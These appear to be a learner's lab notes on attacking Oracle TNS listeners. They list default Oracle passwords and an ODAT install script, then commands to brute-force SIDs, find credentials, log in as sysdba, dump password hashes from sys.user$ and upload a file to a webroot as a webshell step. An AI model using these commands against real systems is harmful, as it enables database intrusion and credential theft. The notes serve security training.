Skip to content

Oracle TNS - 1521

  • TCP 1521
  • Oracle Transparent Network Substrate server is a commz protocol that allows communication between Oracle DBs and applications on the network.
  • supports IPX/SPX and TCP/IP protocol stacks
  • built in encryption; used by enterprises
  • Each database or service has a unique entry in the tnsnames.ora file,
  • information for clients to connect to the service.
    • consists of a name for the service,
    • the network location of the service
    • the database or service name that clients should use when connecting to the service
  • the listener.ora file is a server-side configuration file
  • it defines the listener process's properties and parameters
  • it is responsible for receiving incoming client requests and forwarding them to the appropriate Oracle database instance.
  • In short, the client-side Oracle Net Services software uses the tnsnames.ora file to resolve service names to network addresses, while the listener process uses the listener.ora file to determine the services it should listen to and the behavior of the listener.
  • Oracle databases can be protected by using so-called PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory.
  • It serves as a blacklist

Default Config:

  • Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the $ORACLE_HOME/network/admin directory
  • Oracle 9 default password - CHANGE_ON_INSTALL
  • Oracle 10 has no default password set.

  • Oracle DBSNMP default password - dbsnmp *

#!/bin/bash

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome
  • Run this script to install odat or sudo tar -xvf <package> from https://github.com/quentinhardy/odat
  • ODAT is the Oracle DB Attacking tool
  • For oracle RDBMS, a System Identifier (SID) is given to every db instance.
  • During a connection, the client uses the SID to identify which db instance to connect to.
  • If not specified, the default value from the tnsnames will be used
  • If incorrectly specified, connection fails.
  • Use NMAP, ODAT, HYDRA to guess the SID

COMMANDS:

  • sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
  • ./odat.py all -s 10.129.204.235
  • Found creds using odat

Installing SQLPlus setup instructions

  • sqlplus scott/tiger@10.129.204.235/XE
  • Connect to the SQL instance using sqlplus
  • If we have a libsqlplus error. Run the following
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
  • SQLPLUS Commands - here

Database enum:

  • sqlplus scott/tiger@10.129.204.235/XE as sysdba
  • select table_name from all_tables;
  • select * from user_role_privs;

  • select name, password from sys.user$;\

  • Uploading a webshell if a webserver is running

Uploading a webshell using odat.

  • ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt cURL to get the file.
  • curl -X GET http://10.129.204.235/testing.txt